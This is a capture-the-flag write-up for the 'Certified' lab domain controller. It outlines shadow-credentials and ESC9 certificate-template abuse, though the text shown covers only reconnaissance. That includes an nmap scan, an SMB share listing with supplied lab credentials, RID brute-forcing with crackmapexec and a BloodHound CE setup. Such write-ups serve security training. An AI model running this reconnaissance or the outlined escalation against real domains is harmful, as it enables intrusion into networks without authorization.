# Certified

## SUMMARY

This is a Windows Server 2019 machine running as a domain controller with several overly permissive misconfigurations, which we enumerate with the new BloodHound CE tool, and a vulnerable AD CS template. First we upgrade our rig: we install the new BloodHound CE and update our data collector so it is compatible with the new BloodHound version. Once everything is running, we enumerate the Active Directory and discover overly permissive ACEs that enable a shadow credentials attack on one account. As a result of the attack we obtain an NT hash and gain the user flag.

Regarding escalation, we enumerate AD CS templates and find one vulnerable to ESC9. This is abused to generate an administrator certificate and obtain the administrator NT hash.

## KEYWORDS

BloodHound CE, BloodHound-CE-Python, Impacket, owneredit.py, dacledit.py, shadow credentials attack, pyWhisker, bloodyAD, Active Directory Certificate Services (AD CS), ESC9.

## REFERENCES

<https://github.com/SpecterOps/BloodHound>

<https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose>

<https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf>

<https://github.com/dirkjanm/BloodHound.py>

<https://github.com/CravateRouge/bloodyAD>

<https://i-tracing.com/blog/dacl-shadow-credentials/>

<https://github.com/ShutdownRepo/pywhisker>

<https://github.com/dirkjanm/PKINITtools>

<https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword>

<https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf>

<https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html>

<https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7>

## ENUMERATION

Port scan.

{% code overflow="wrap" %}

```bash
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done

Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-08 07:44 EST
Nmap scan report for 10.10.11.41
Host is up, received user-set (0.078s latency).
Scanned at 2025-01-08 07:44:19 EST for 100s
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-01-08 19:45:04Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
| MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm
| aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa
| Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX
| E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8
| wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i
| Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6
| 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E
| e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C
| AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A
| dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD
| VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G
| CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl
| AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE
| FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L
| csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp
| ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk
| LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh
| c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr
| BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO
| PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy
| YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq
| ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG
| AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw
| TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0
| Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC
| AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW
| VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv
| ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE
| aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU
| fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI
| zQY41iYatWCKZW54Ylno2wj9tg==
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
| MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm
| aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa
| Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX
| E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8
| wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i
| Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6
| 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E
| e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C
| AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A
| dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD
| VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G
| CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl
| AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE
| FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L
| csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp
| ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk
| LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh
| c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr
| BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO
| PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy
| YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq
| ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG
| AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw
| TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0
| Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC
| AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW
| VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv
| ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE
| aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU
| fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI
| zQY41iYatWCKZW54Ylno2wj9tg==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time.
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
| MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm
| aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa
| Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX
| E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8
| wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i
| Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6
| 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E
| e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C
| AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A
| dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD
| VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G
| CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl
| AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE
| FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L
| csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp
| ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk
| LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh
| c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr
| BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO
| PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy
| YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq
| ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG
| AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw
| TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0
| Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC
| AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW
| VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv
| ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE
| aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU
| fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI
| zQY41iYatWCKZW54Ylno2wj9tg==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
| MIIGPzCCBSegAwIBAgITeQAAAAIvfMdjJV9GkQAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBMMRMwEQYKCZImiZPyLGQBGRYDaHRiMRkwFwYKCZImiZPyLGQBGRYJY2VydGlm
| aWVkMRowGAYDVQQDExFjZXJ0aWZpZWQtREMwMS1DQTAeFw0yNDA1MTMxNTQ5MzZa
| Fw0yNTA1MTMxNTQ5MzZaMB0xGzAZBgNVBAMTEkRDMDEuY2VydGlmaWVkLmh0YjCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMx/FhgH36heOUjpNhO4JWYX
| E0zDwpKfx3dfqvEqTvIfRLpptNUCfkaeZijP+YAlUMNSNUvgFLZ7yuZf3ubIcEv8
| wXMlABwpVxe3NtOzLXQhNypU/W53DgYZoD9ueC3ob6f4jI6dN6jKt4gV/pBmoX3i
| Ky0XmrIaMkO8W20gzJtf8RaZYChHzhilGs3TwkKmBkZFt4+KeTkCbBE4T8zka8l6
| 52hfOhdz5YOU82eviJuTQqaprVtognmW6EV2C7laO+UvQy2VwZc9L+6A42t5Pz2E
| e+28xaBIGAgNn5TMcS+oJC0qhnAFNazT2X4p0aq3WBlF5BMwadrEwk59t4VcRc0C
| AwEAAaOCA0cwggNDMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4A
| dAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYD
| VR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4G
| CCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFl
| AwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYE
| FPTg6Uo2pYQv7jJTC9x7Reo9CbVVMB8GA1UdIwQYMBaAFOz7EkAVob3H0S47Lk1L
| csBi3yv1MIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWNlcnRp
| ZmllZC1EQzAxLUNBLENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2VydGlmaWVk
| LERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xh
| c3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcUGCCsGAQUFBwEBBIG4MIG1MIGyBggr
| BgEFBQcwAoaBpWxkYXA6Ly8vQ049Y2VydGlmaWVkLURDMDEtQ0EsQ049QUlBLENO
| PVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3Vy
| YXRpb24sREM9Y2VydGlmaWVkLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2Jq
| ZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsG
| AQQBgjcZAaASBBBTwp5mQoxFT6ExYzeAVBiughJEQzAxLmNlcnRpZmllZC5odGIw
| TgYJKwYBBAGCNxkCBEEwP6A9BgorBgEEAYI3GQIBoC8ELVMtMS01LTIxLTcyOTc0
| Njc3OC0yNjc1OTc4MDkxLTM4MjAzODgyNDQtMTAwMDANBgkqhkiG9w0BAQsFAAOC
| AQEAk4PE1BZ/qAgrUyzYM5plxxgUpGbICaWEkDkyiu7uCaTOehQ4rITZE1xefpHW
| VVEULz9UqlozCQgaKy3BRQsUjMZgkcQt0D+5Ygnri/+M3adcYWpJHsk+gby/JShv
| ztRj1wS/X6SEErDaf9Nw0jgZi3QCaNqH2agxwj+oA+mCMd5mBq7JtWcCI3wQ3xuE
| aOEd9Q86T/J4ZdGC+8iQKt3GrvHzTEDijK9zWxm8nuftG/AyBU0N23xJCLgWZkQU
| fgVn+2b7pjWIPAWdZv8WqcJV1tinG0oM83wgbg3Nv3ZeoEwDCs5MgYprXNImNGtI
| zQY41iYatWCKZW54Ylno2wj9tg==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-08T19:46:42+00:00; +7h00m43s from scanner time.
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack Microsoft Windows RPC
49683/tcp open  msrpc         syn-ack Microsoft Windows RPC
49716/tcp open  msrpc         syn-ack Microsoft Windows RPC
49740/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 50458/tcp): CLEAN (Timeout)
|   Check 2 (port 47719/tcp): CLEAN (Timeout)
|   Check 3 (port 13824/udp): CLEAN (Timeout)
|   Check 4 (port 12583/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 7h00m42s, deviation: 0s, median: 7h00m42s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-08T19:46:01
|_  start_date: N/A
 
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds
 
List of open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49716,49740
```

{% endcode %}

We also have credentials for `judith.mader:judith09`. We can use them to enumerate the SMB service.

```bash
> smbmap -H certified.htb -P 445 -u judith.mader -p judith09 
[+] IP: certified.htb:445       Name: unknown                                          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
```

And brute-force RIDs to get a list of usernames.

```bash
> crackmapexec smb certified.htb -u judith.mader -p judith09 --rid-brute
SMB         10.10.11.41     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09
SMB         10.10.11.41     445    DC01             [+] Brute forcing RIDs
SMB         10.10.11.41     445    DC01             498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             500: CERTIFIED\Administrator (SidTypeUser)
SMB         10.10.11.41     445    DC01             501: CERTIFIED\Guest (SidTypeUser)
SMB         10.10.11.41     445    DC01             502: CERTIFIED\krbtgt (SidTypeUser)
SMB         10.10.11.41     445    DC01             512: CERTIFIED\Domain Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             513: CERTIFIED\Domain Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             514: CERTIFIED\Domain Guests (SidTypeGroup)
SMB         10.10.11.41     445    DC01             515: CERTIFIED\Domain Computers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             516: CERTIFIED\Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             517: CERTIFIED\Cert Publishers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             518: CERTIFIED\Schema Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             519: CERTIFIED\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.41     445    DC01             521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             525: CERTIFIED\Protected Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             526: CERTIFIED\Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             527: CERTIFIED\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             553: CERTIFIED\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1000: CERTIFIED\DC01$ (SidTypeUser)
SMB         10.10.11.41     445    DC01             1101: CERTIFIED\DnsAdmins (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1103: CERTIFIED\judith.mader (SidTypeUser)
SMB         10.10.11.41     445    DC01             1104: CERTIFIED\Management (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1105: CERTIFIED\management_svc (SidTypeUser)
SMB         10.10.11.41     445    DC01             1106: CERTIFIED\ca_operator (SidTypeUser)
SMB         10.10.11.41     445    DC01             1601: CERTIFIED\alexander.huges (SidTypeUser)
SMB         10.10.11.41     445    DC01             1602: CERTIFIED\harry.wilson (SidTypeUser)
SMB         10.10.11.41     445    DC01             1603: CERTIFIED\gregory.cameron (SidTypeUser)
```

This looks like an excellent opportunity to test [BloodHound CE](https://github.com/SpecterOps/BloodHound), the new version of the legendary graphical Active Directory enumeration tool BloodHound. The original release is now called BloodHound Legacy, and there is also a separate BloodHound Enterprise version.

Let's follow the [instructions to install BloodHound CE](https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose). The process uses Docker Compose and looks simpler than the setup of the classic release.

Download the Compose file and run it.

```bash
> curl -L https://ghst.ly/getbhce > docker-compose.yml

> docker compose up
```

<figure><img src="/files/Y56mcFTSwmXmCicPsZEg" alt=""><figcaption></figcaption></figure>

When finished, access the BHCE GUI at <http://localhost:8080/ui/login>. The username is `admin` and the password is printed in the Docker Compose output. Take note of it, as it must be reset on first login.

Once inside the tool, we are presented with an empty database.

<figure><img src="/files/tHAfcRH8JeXCr043HKV2" alt=""><figcaption></figcaption></figure>

We need a collector to gather data to ingest. We do not have a shell on the host, so we cannot use `SharpHound.exe`; we will have to collect the data remotely with `BloodHound.py`. However, [collectors for BloodHound Legacy no longer work with BHCE](https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf), so we will have to update our toolbox.

In the [BloodHound.py GitHub repository](https://github.com/dirkjanm/BloodHound.py) we see there is a new package called `bloodhound-ce` specifically designed for BHCE.

Install it with `pip`.

```bash
> pip install bloodhound-ce
```

The binary is installed at `/home/kali/.local/bin/bloodhound-ce-python` and runs under Python 3.

{% code overflow="wrap" %}

```bash
> python3 /home/kali/.local/bin/bloodhound-ce-python -u judith.mader -p 'judith09' -c All -d certified.htb -ns 10.10.11.41
```

{% endcode %}

<figure><img src="/files/6Goky3T1zerL15NMW5In" alt=""><figcaption></figcaption></figure>

Just take the JSON files and ingest the data in BHCE. Click on *Settings → Administration → Upload Files*.

